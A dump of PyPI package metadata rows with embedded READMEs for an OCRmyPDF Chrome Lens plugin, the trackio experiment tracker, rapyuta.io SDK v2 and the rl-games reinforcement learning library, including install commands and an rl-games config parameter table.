| ocrmypdf, ocr, google-lens, pdf, plugin | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: End Users/Desktop",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Image Recognition",
"Topic :: Text Processing :: Indexing"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"ocrmypdf>=16.0.0",
"requests",
"Pillow",
"packaging",
"pytest; extra == \"test\"",
"pytest-cov; extra == \"test\""
] | [] | [] | [] | [
"Homepage, https://github.com/atlantos/OCRmyPDF-ChromeLens-Ocr",
"Bug Tracker, https://github.com/atlantos/OCRmyPDF-ChromeLens-Ocr/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:23:08.040308 | ocrmypdf_chromelens_ocr-1.0.7.tar.gz | 24,203 | 9e/a5/3114b238ae0414afa994c7598e6b45509e2f1dbf2c05f4702f3cf8b5b797/ocrmypdf_chromelens_ocr-1.0.7.tar.gz | source | sdist | null | false | 35e578fae162e32defd3a2e1895c7a9a | 1ca7b14748b27457a68b166a70badebf891d077dd47de036b521090633d39c80 | 9ea53114b238ae0414afa994c7598e6b45509e2f1dbf2c05f4702f3cf8b5b797 | null | [
"LICENSE"
] | 227 |
2.4 | trackio | 0.16.1 | A lightweight, local-first, and free experiment tracking library built on top of Hugging Face Datasets and Spaces. | <p align="center">
<picture>
<source media="(prefers-color-scheme: dark)" srcset="trackio/assets/trackio_logo_type_dark_transparent.png">
<source media="(prefers-color-scheme: light)" srcset="trackio/assets/trackio_logo_type_light_transparent.png">
<img width="75%" alt="Trackio Logo" src="trackio/assets/trackio_logo_type_light_transparent.png">
</picture>
</p>
<div align="center">
[](https://github.com/gradio-app/trackio/actions/workflows/test.yml)
[](https://pypi.org/project/trackio/)
[](https://pypi.org/project/trackio/)

[](https://twitter.com/trackioapp)
</div>
`trackio` is a lightweight, free experiment tracking Python library built by Hugging Face 🤗.

- **API compatible** with `wandb.init`, `wandb.log`, and `wandb.finish`. Drop-in replacement: just
```python
import trackio as wandb
```
and keep your existing logging code.
- **Local-first** design: dashboard runs locally by default. You can also host it on Spaces by specifying a `space_id` in `trackio.init()`.
- Persists logs in a SQLite database locally (or, if you provide a `space_id`, in a private Hugging Face Dataset)
- Visualize experiments with a Gradio dashboard locally (or, if you provide a `space_id`, on Hugging Face Spaces)
- **LLM-friendly**: Built with autonomous ML experiments in mind, Trackio includes a CLI for programmatic access and a Python API for run management, making it easy for LLMs to log metrics and query experiment data.
- Everything here, including hosting on Hugging Face, is **free**!
Trackio is designed to be lightweight (the core codebase is <5,000 lines of Python code), not fully-featured. It is designed in an extensible way and written entirely in Python so that developers can easily fork the repository and add functionality that they care about.
## Installation
Trackio requires [Python 3.10 or higher](https://www.python.org/downloads/). Install with `pip`:
```bash
pip install trackio
```
or with `uv`:
```bash
uv pip install trackio
```
## Usage
To get started, you can run a simple example that logs some fake training metrics:
```python
import trackio
import random
import time

runs = 3
epochs = 8

for run in range(runs):
    trackio.init(
        project="my-project",
        config={"epochs": epochs, "learning_rate": 0.001, "batch_size": 64}
    )
    for epoch in range(epochs):
        train_loss = random.uniform(0.2, 1.0)
        train_acc = random.uniform(0.6, 0.95)
        val_loss = train_loss - random.uniform(0.01, 0.1)
        val_acc = train_acc + random.uniform(0.01, 0.05)
        trackio.log({
            "epoch": epoch,
            "train_loss": train_loss,
            "train_accuracy": train_acc,
            "val_loss": val_loss,
            "val_accuracy": val_acc
        })
        time.sleep(0.2)
    trackio.finish()
```
Running the above will print instructions to the terminal for launching the dashboard.
The usage of `trackio` is designed to be identical to `wandb` in most cases, so you can easily switch between the two libraries.
```py
import trackio as wandb
```
## Dashboard
You can launch the dashboard by running in your terminal:
```bash
trackio show
```
or, in Python:
```py
import trackio
trackio.show()
```
You can also provide an optional `project` name as the argument to load a specific project directly:
```bash
trackio show --project "my-project"
```
or, in Python:
```py
import trackio
trackio.show(project="my-project")
```
## Deploying to Hugging Face Spaces
When calling `trackio.init()`, by default the service will run locally and store project data on the local machine.
But if you pass a `space_id` to `init`, like:
```py
trackio.init(project="my-project", space_id="orgname/space_id")
```
or
```py
trackio.init(project="my-project", space_id="username/space_id")
```
it will use an existing Hugging Face Space or automatically deploy a new one as needed. You should be logged in locally with the `huggingface-cli`, and your token must have write permissions to create the Space.
## Syncing Offline Projects to Spaces
If you've been tracking experiments locally and want to move them to Hugging Face Spaces for sharing or collaboration, use the `sync` function:
```py
import trackio
trackio.sync(project="my-project", space_id="username/space_id")
```
This uploads your local project database to a new or existing Space. The Space will display all your logged experiments and metrics.
**Example workflow:**
```py
import trackio
# Start tracking locally
trackio.init(project="my-project", config={"lr": 0.001})
trackio.log({"loss": 0.5})
trackio.finish()
# Later, sync to Spaces
trackio.sync(project="my-project", space_id="username/my-experiments")
```
## Embedding a Trackio Dashboard
One of the reasons we created `trackio` was to make it easy to embed live dashboards on websites, blog posts, or anywhere else you can embed a website.

If you are hosting your Trackio dashboard on Spaces, then you can embed the URL of that Space as an IFrame. You can even use query parameters to show only specific projects and/or metrics, e.g.
```html
<iframe src="https://abidlabs-trackio-1234.hf.space/?project=my-project&metrics=train_loss,train_accuracy&sidebar=hidden" style="width:1600px; height:500px; border:0;"></iframe>
```
Supported query parameters:
- `project`: (string) Filter the dashboard to show only a specific project
- `metrics`: (comma-separated list) Filter the dashboard to show only specific metrics, e.g. `train_loss,train_accuracy`
- `sidebar`: (string: one of "hidden" or "collapsed"). If "hidden", then the sidebar will not be visible. If "collapsed", the sidebar will be in a collapsed state initially but the user will be able to open it. Otherwise, by default, the sidebar is shown in an open and visible state.
- `footer`: (string: "false"). When set to "false", hides the Gradio footer. By default, the footer is visible.
- `xmin`: (number) Set the initial minimum value for the x-axis limits across all metric plots.
- `xmax`: (number) Set the initial maximum value for the x-axis limits across all metric plots.
- `smoothing`: (number) Set the initial value of the smoothing slider (0-20, where 0 = no smoothing).
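The query string for such an embed can also be assembled programmatically. A minimal sketch using only the standard library (the Space URL below is a placeholder, and `embed_url` is a hypothetical helper, not part of trackio):

```python
from urllib.parse import urlencode

def embed_url(space_url: str, **params) -> str:
    """Build a Trackio dashboard embed URL from query parameters.

    Comma-joins list values (e.g. metrics) and drops None entries.
    """
    query = {
        k: ",".join(v) if isinstance(v, (list, tuple)) else v
        for k, v in params.items()
        if v is not None
    }
    return f"{space_url.rstrip('/')}/?{urlencode(query, safe=',')}"

url = embed_url(
    "https://username-trackio.hf.space",  # placeholder Space URL
    project="my-project",
    metrics=["train_loss", "train_accuracy"],
    sidebar="hidden",
)
print(url)
```

The resulting string can be dropped into the `src` attribute of the IFrame shown above.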
## Examples
To get started and see basic examples of usage, see these files:
- [Basic example of logging metrics locally](https://github.com/gradio-app/trackio/blob/main/examples/fake-training.py)
- [Persisting metrics in a Hugging Face Dataset](https://github.com/gradio-app/trackio/blob/main/examples/persist-dataset.py)
- [Deploying the dashboard to Spaces](https://github.com/gradio-app/trackio/blob/main/examples/deploy-on-spaces.py)
## Note: Trackio is in Beta (DB Schema May Change)
Note that Trackio is currently in pre-release and we may release breaking changes. In particular, the schema of the Trackio SQLite database may change, which may require migrating or deleting existing database files (located by default at `~/.cache/huggingface/trackio`).
Since Trackio is in beta, your feedback is welcome! Please create issues with bug reports or feature requests.
## License
MIT License
## Documentation
The complete documentation and API reference for each version of Trackio can be found at: https://huggingface.co/docs/trackio/index
## Contribute
We welcome contributions to Trackio! Whether you're fixing bugs, adding features, or improving documentation, your contributions help make Trackio better for the entire machine learning community.
<p align="center">
<img src="https://contrib.rocks/image?repo=gradio-app/trackio" />
</p>
To start contributing, see our [Contributing Guide](CONTRIBUTING.md).
### Development Setup
To set up Trackio for development, clone this repo and run:
```bash
pip install -e ".[dev,tensorboard]"
```
## Pronunciation
Trackio is pronounced TRACK-yo, as in "track yo' experiments"
| text/markdown | null | Abubakar Abid <abubakar@huggingface.co>, Zach Nation <zach@huggingface.co> | null | null | null | null | [
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"gradio[oauth]<7.0.0,>=6.6.0",
"huggingface-hub<2.0.0",
"numpy<3.0.0",
"orjson<4.0.0,>=3.0",
"pandas<3.0.0",
"pillow<12.0.0",
"plotly<7.0.0,>=6.0.0",
"pydub<1.0.0",
"tomli>=2.0.0; python_version < \"3.11\"",
"playwright<2.0.0,>=1.40.0; extra == \"dev\"",
"pytest-playwright<1.0.0,>=0.7.0; extra == \"dev\"",
"pytest<9.0.0,>=8.0.0; extra == \"dev\"",
"ruff==0.9.3; extra == \"dev\"",
"nvidia-ml-py>=12.0.0; extra == \"gpu\"",
"pyarrow>=21.0; extra == \"spaces\"",
"tbparse==0.0.9; extra == \"tensorboard\"",
"tensorboardx<3.0.0,>=2.0.0; extra == \"tensorboard\""
] | [] | [] | [] | [
"homepage, https://github.com/gradio-app/trackio",
"repository, https://github.com/gradio-app/trackio"
] | twine/6.2.0 CPython/3.10.12 | 2026-02-20T06:21:04.310392 | trackio-0.16.1-py3-none-any.whl | 1,005,881 | a1/09/1f8c23c8b1dc35fc8d2d25ff2bb61728495b6374d9a89f130632eaba90b6/trackio-0.16.1-py3-none-any.whl | py3 | bdist_wheel | null | false | 6d5320b32b56d4630fb3b40b6bd1bf8f | a5e670331296f57f34044552ba8da396247ab6df4be3895e55811bdf75375687 | a1091f8c23c8b1dc35fc8d2d25ff2bb61728495b6374d9a89f130632eaba90b6 | null | [
"LICENSE"
] | 1,745 |
2.4 | rapyuta-io-sdk-v2 | 0.4.2 | Python SDK for rapyuta.io v2 APIs | <p align="center">
<picture>
<source media="(prefers-color-scheme: dark)" srcset="./assets/v2sdk-logo-dark.png">
<img alt="rapyuta.io SDK v2 Logo" src="./assets/v2sdk-logo-light.png">
</picture>
</p>
# rapyuta.io SDK v2
rapyuta.io SDK v2 provides a comprehensive set of tools and functionalities to interact with the rapyuta.io platform.
## Installation
```bash
pip install rapyuta-io-sdk-v2
```
## Usage
To use the SDK, you need to configure it with your rapyuta.io credentials.
### From a Configuration File
You can create a `Configuration` object from a JSON file.
```python
from rapyuta_io_sdk_v2.config import Configuration, Client
config = Configuration.from_file("/path/to/config.json")
client = Client(config)
```
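The exact schema of `config.json` is defined by the SDK; purely as an illustration (these keys are assumptions based on the `Configuration` fields shown in this README, not the documented format), such a file might look like:

```json
{
  "organization_guid": "ORGANIZATION_GUID",
  "project_guid": "PROJECT_GUID",
  "auth_token": "AUTH_TOKEN"
}
```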
### Using `email` and `password`
```python
from rapyuta_io_sdk_v2.config import Configuration, Client
config = Configuration(organization_guid="ORGANIZATION_GUID")
client = Client(config)
client.login(email="EMAIL", password="PASSWORD")
```
You are now set to invoke various methods on the `client` object.
For example, this is how you can list projects.
```python
projects = client.list_projects()
print(projects)
```
## Contributing
We welcome contributions. Please read our [contribution guidelines](CONTRIBUTING.md) to get started. | text/markdown | null | null | null | null | Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). 
"Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. 
Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the 
Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. 
Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. 
To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"httpx>=0.27.2",
"pydantic-settings>=2.7.1",
"python-benedict>=0.30",
"pyyaml>=6.0.2"
] | [] | [] | [] | [] | uv/0.4.22 | 2026-02-20T06:19:29.055851 | rapyuta_io_sdk_v2-0.4.2.tar.gz | 123,124 | d8/99/b7b2ae80254eb676364e93cd772f106842265138f85ac501dc3051a79c0a/rapyuta_io_sdk_v2-0.4.2.tar.gz | source | sdist | null | false | 16a622b4764e2afd07cf310bb9436cba | 95b9e282787108afe61f3f5631b9d26019826eecd917b1f9e39c67a921d02655 | d899b7b2ae80254eb676364e93cd772f106842265138f85ac501dc3051a79c0a | null | [] | 422 |
2.4 | rl-games | 1.6.5 | High-performance Reinforcement Learning framework for games and robotics | # RL Games: High performance RL library
## Discord Channel Link
* https://discord.gg/hnYRq7DsQh
## Papers and related links
* Isaac Gym: High Performance GPU-Based Physics Simulation For Robot Learning: https://arxiv.org/abs/2108.10470
* DeXtreme: Transfer of Agile In-Hand Manipulation from Simulation to Reality: https://dextreme.org/ https://arxiv.org/abs/2210.13702
* Transferring Dexterous Manipulation from GPU Simulation to a Remote Real-World TriFinger: https://s2r2-ig.github.io/ https://arxiv.org/abs/2108.09779
* Is Independent Learning All You Need in the StarCraft Multi-Agent Challenge? <https://arxiv.org/abs/2011.09533>
* Superfast Adversarial Motion Priors (AMP) implementation: https://twitter.com/xbpeng4/status/1506317490766303235 https://github.com/NVIDIA-Omniverse/IsaacGymEnvs
* OSCAR: Data-Driven Operational Space Control for Adaptive and Robust Robot Manipulation: https://cremebrule.github.io/oscar-web/ https://arxiv.org/abs/2110.00704
* EnvPool: A Highly Parallel Reinforcement Learning Environment Execution Engine: https://arxiv.org/abs/2206.10558 and https://github.com/sail-sg/envpool
* TimeChamber: A Massively Parallel Large Scale Self-Play Framework: https://github.com/inspirai/TimeChamber
## Some results on the different environments
* [NVIDIA Isaac Gym](docs/ISAAC_GYM.md)




* [Dextreme](https://dextreme.org/)

* [DexPBT](https://sites.google.com/view/dexpbt)

* [Starcraft 2 Multi Agents](docs/SMAC.md)
* [BRAX](docs/BRAX.md)
* [Mujoco Envpool](docs/MUJOCO_ENVPOOL.md)
* [DeepMind Envpool](docs/DEEPMIND_ENVPOOL.md)
* [Atari Envpool](docs/ATARI_ENVPOOL.md)
* [Random Envs](docs/OTHER.md)
Implemented in Pytorch:
* PPO with the support of asymmetric actor-critic variant
* Support of end-to-end GPU accelerated training pipeline with Isaac Gym and Brax
* Masked actions support
* Multi-agent training, decentralized and centralized critic variants
* Self-play
Implemented in Tensorflow 1.x (was removed in this version):
* Rainbow DQN
* A2C
* PPO
## Quickstart: Colab in the Cloud
Explore RL Games quickly and easily in Colab notebooks:
* [Mujoco training](https://colab.research.google.com/github/Denys88/rl_games/blob/master/notebooks/mujoco_envpool_training.ipynb) Mujoco envpool training example.
* [Brax training](https://colab.research.google.com/github/Denys88/rl_games/blob/master/notebooks/brax_training.ipynb) Brax training example, with keeping all the observations and actions on GPU.
* [ONNX export example with CartPole (discrete action space)](https://colab.research.google.com/github/Denys88/rl_games/blob/master/notebooks/train_and_export_onnx_example_discrete.ipynb) envpool training and ONNX export.
* [ONNX export example with Pendulum (continuous action space)](https://colab.research.google.com/github/Denys88/rl_games/blob/master/notebooks/train_and_export_onnx_example_continuous.ipynb) envpool training and ONNX export.
* [ONNX export example with Pendulum (continuous action space, LSTM)](https://colab.research.google.com/github/Denys88/rl_games/blob/master/notebooks/train_and_export_onnx_example_lstm_continuous.ipynb) envpool training and ONNX export.
## Installation
For maximum training performance, a preliminary installation of PyTorch 2.2 or newer with CUDA 12.1 or newer is highly recommended:
```bash
pip3 install torch torchvision
```
Then:
```bash
pip install rl-games
```
Or clone the repo and install the latest version from source:
```bash
pip install -e .
```
To run CPU-based environments, either envpool (where supported) or Ray is required: ```pip install envpool``` or ```pip install ray```.
To train on Mujoco, Atari or Box2D based environments, they need to be installed additionally with ```pip install gym[mujoco]```, ```pip install gym[atari]``` or ```pip install gym[box2d]``` respectively.
Atari also requires ```pip install opencv-python```. For modern Gymnasium/ALE Atari environments, install ```pip install ale-py```. In addition, installing envpool is highly recommended for maximum simulation and training performance with Mujoco and Atari environments: ```pip install envpool```
### EnvPool + NumPy 2+ Incompatibility
**IMPORTANT:** If using EnvPool, you **must** use NumPy 1.x. NumPy 2.0+ is **NOT compatible** with EnvPool and will cause training failures ([see issue](https://github.com/sail-sg/envpool/issues/312)).
Downgrade to NumPy 1.26.4:
```bash
pip uninstall numpy
pip install numpy==1.26.4
```
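A quick guard can fail fast on this incompatibility at the top of a training script. A sketch (the helper name is ours, and the version parsing assumes standard `major.minor.patch` strings):

```python
import warnings
from importlib.metadata import PackageNotFoundError, version

def numpy_ok_for_envpool(numpy_version: str) -> bool:
    """EnvPool currently requires NumPy 1.x; 2.0+ breaks it."""
    return int(numpy_version.split(".")[0]) < 2

try:
    installed = version("numpy")
except PackageNotFoundError:
    installed = None  # numpy not installed; nothing to check

if installed and not numpy_ok_for_envpool(installed):
    warnings.warn(
        f"NumPy {installed} is incompatible with EnvPool; "
        "pin numpy==1.26.4 before training."
    )
```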
## Citing
If you use rl-games in your research please use the following citation:
```bibtex
@misc{rl-games2021,
title = {rl-games: A High-performance Framework for Reinforcement Learning},
author = {Makoviichuk, Denys and Makoviychuk, Viktor},
month = {May},
year = {2021},
publisher = {GitHub},
journal = {GitHub repository},
howpublished = {\url{https://github.com/Denys88/rl_games}},
}
```
## Development setup
```bash
poetry install
# install cuda related dependencies
poetry run pip install torch torchvision
```
## Training
**NVIDIA Isaac Gym**
Download and follow the installation instructions of Isaac Gym: https://developer.nvidia.com/isaac-gym
And IsaacGymEnvs: https://github.com/NVIDIA-Omniverse/IsaacGymEnvs
*Ant*
```bash
python train.py task=Ant headless=True
python train.py task=Ant test=True checkpoint=nn/Ant.pth num_envs=100
```
*Humanoid*
```bash
python train.py task=Humanoid headless=True
python train.py task=Humanoid test=True checkpoint=nn/Humanoid.pth num_envs=100
```
*Shadow Hand block orientation task*
```bash
python train.py task=ShadowHand headless=True
python train.py task=ShadowHand test=True checkpoint=nn/ShadowHand.pth num_envs=100
```
**Other**
*Atari Pong*
```bash
python runner.py --train --file rl_games/configs/atari/ppo_pong_envpool.yaml
python runner.py --play --file rl_games/configs/atari/ppo_pong_envpool.yaml --checkpoint nn/Pong-v5_envpool.pth
```
Or with poetry:
```bash
poetry install -E atari
poetry run python runner.py --train --file rl_games/configs/atari/ppo_pong.yaml
poetry run python runner.py --play --file rl_games/configs/atari/ppo_pong.yaml --checkpoint nn/PongNoFrameskip.pth
```
*Brax Ant*
```bash
pip install -U "jax[cuda12]"
pip install brax
python runner.py --train --file rl_games/configs/brax/ppo_ant.yaml
python runner.py --play --file rl_games/configs/brax/ppo_ant.yaml --checkpoint runs/Ant_brax/nn/Ant_brax.pth
```
## Experiment tracking
rl_games supports experiment tracking with [Weights and Biases](https://wandb.ai).
```bash
python runner.py --train --file rl_games/configs/atari/ppo_breakout_torch.yaml --track
WANDB_API_KEY=xxxx python runner.py --train --file rl_games/configs/atari/ppo_breakout_torch.yaml --track
python runner.py --train --file rl_games/configs/atari/ppo_breakout_torch.yaml --wandb-project-name rl-games-special-test --track
python runner.py --train --file rl_games/configs/atari/ppo_breakout_torch.yaml --wandb-project-name rl-games-special-test --wandb-entity openrlbenchmark --track
```
## Multi GPU
We use `torchrun` to orchestrate any multi-gpu runs.
```bash
torchrun --standalone --nnodes=1 --nproc_per_node=2 runner.py --train --file rl_games/configs/ppo_cartpole.yaml
```
## Config Parameters
| Field | Example Value | Default | Description |
| ---------------------- | ------------------------- | ------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| seed | 8 | None | Seed for pytorch, numpy etc. |
| algo | | | Algorithm block. |
| name | a2c_continuous | None | Algorithm name. Possible values are: sac, a2c_discrete, a2c_continuous |
| model | | | Model block. |
| name | continuous_a2c_logstd | None | Possible values: continuous_a2c (expects sigma in (0, +inf)), continuous_a2c_logstd (expects sigma in (-inf, +inf)), a2c_discrete, a2c_multi_discrete |
| network | | | Network description. |
| name | actor_critic | | Possible values: actor_critic or soft_actor_critic. |
| separate | False | | Whether or not to use a separate network with the same architecture for the critic. In almost all cases, if you normalize the value it is better to keep it False |
| space | | | Network space |
| continuous | | | continuous or discrete |
| mu_activation | None | | Activation for mu. In almost all cases None works the best, but we may try tanh. |
| sigma_activation | None | | Activation for sigma. Will be treated as log(sigma) or sigma depending on the model. |
| mu_init | | | Initializer for mu. |
| name | default | | |
| sigma_init | | | Initializer for sigma. If you are using the logstd model, a good value is 0. |
| name | const_initializer | | |
| val | 0 | | |
| fixed_sigma | True | | If true then sigma vector doesn't depend on input. |
| cnn | | | Convolution block. |
| type | conv2d | | Type: right now two types are supported: conv2d or conv1d |
| activation | elu | | Activation between conv layers. |
| initializer | | | Initializer. Some names are taken from TensorFlow. |
| name | glorot_normal_initializer | | Initializer name |
| gain | 1.4142 | | Additional parameter. |
| convs | | | Convolution layers. Same parameters as we have in torch. |
| filters | 32 | | Number of filters. |
| kernel_size | 8 | | Kernel size. |
| strides | 4 | | Strides |
| padding | 0 | | Padding |
| filters | 64 | | Next convolution layer info. |
| kernel_size | 4 | | |
| strides | 2 | | |
| padding | 0 | | |
| filters | 64 | | |
| kernel_size | 3 | | |
| strides | 1 | | |
| padding | 0 | | |
| mlp | | | MLP Block. Convolution is supported too. See other config examples. |
| units | | | Array of sizes of the MLP layers, for example: [512, 256, 128] |
| d2rl | False | | Use d2rl architecture from https://arxiv.org/abs/2010.09163. |
| activation | elu | | Activations between dense layers. |
| initializer | | | Initializer. |
| name | default | | Initializer name. |
| rnn | | | RNN block. |
| name | lstm | | RNN Layer name. lstm and gru are supported. |
| units | 256 | | Number of units. |
| layers | 1 | | Number of layers |
| before_mlp | False | False | Apply rnn before mlp block or not. |
| config | | | RL Config block. |
| reward_shaper | | | Reward Shaper. Can apply simple transformations. |
| min_val | -1 | | You can apply min_val, max_val, scale and shift. |
| scale_value | 0.1 | 1 | |
| normalize_advantage | True | True | Normalize Advantage. |
| gamma | 0.995 | | Reward Discount |
| tau | 0.95 | | Lambda for GAE. Called tau by mistake a long time ago because lambda is a keyword in Python :( |
| learning_rate | 3e-4 | | Learning rate. |
| name | walker | | Name which will be used in tensorboard. |
| save_best_after | 10 | | How many epochs to wait before starting to save the checkpoint with the best score. |
| score_to_win | 300 | | If the score is >= this value, training will stop. |
| grad_norm | 1.5 | | Grad norm. Applied if truncate_grads is True. A good value is in (1.0, 10.0) |
| entropy_coef | 0 | | Entropy coefficient. Good value for continuous space is 0. For discrete is 0.02 |
| truncate_grads | True | | Apply truncate grads or not. It stabilizes training. |
| env_name | BipedalWalker-v3 | | Environment name. |
| e_clip | 0.2 | | Clip parameter for the PPO loss. |
| clip_value | False | | Apply clip to the value loss. If you are using normalize_value you don't need it. |
| num_actors | 16 | | Number of running actors/environments. |
| horizon_length | 4096 | | Horizon length per actor. The total number of steps will be num_actors * horizon_length * num_agents (num_agents == 1 if the env is not multi-agent). |
| minibatch_size | 8192 | | Minibatch size. The total number of steps must be divisible by the minibatch size. |
| minibatch_size_per_env | 8 | | Minibatch size per env. If specified, it overrides the default minibatch size with minibatch_size_per_env * num_envs. |
| mini_epochs | 4 | | Number of miniepochs. Good value is in [1,10] |
| critic_coef | 2 | | Critic coef. by default critic_loss = critic_coef * 1/2 * MSE. |
| lr_schedule | adaptive | None | Scheduler type. Could be None, linear or adaptive. Adaptive is the best for continuous control tasks. The learning rate is changed every miniepoch |
| kl_threshold | 0.008 | | KL threshold for the adaptive schedule. If KL < kl_threshold/2 then lr = lr * 1.5, and vice versa. |
| normalize_input | True | | Apply running mean std for input. |
| bounds_loss_coef | 0.0 | | Coefficient for the auxiliary loss for continuous action spaces. |
| max_epochs | 10000 | | Maximum number of epochs to run. |
| max_frames | 5000000 | | Maximum number of frames (env steps) to run. |
| normalize_value | True | | Use value running mean std normalization. |
| use_diagnostics | True | | Adds more information into the tensorboard. |
| value_bootstrap | True | | Bootstrapping the value when an episode finishes. Very useful for many locomotion envs. |
| bound_loss_type | regularisation | None | Adds an aux loss for the continuous case. 'regularisation' is the sum of squared actions. 'bound' is the sum of actions greater than 1.1. |
| bounds_loss_coef | 0.0005 | 0 | Regularisation coefficient |
| use_smooth_clamp | False | | Use smooth clamp instead of regular for cliping |
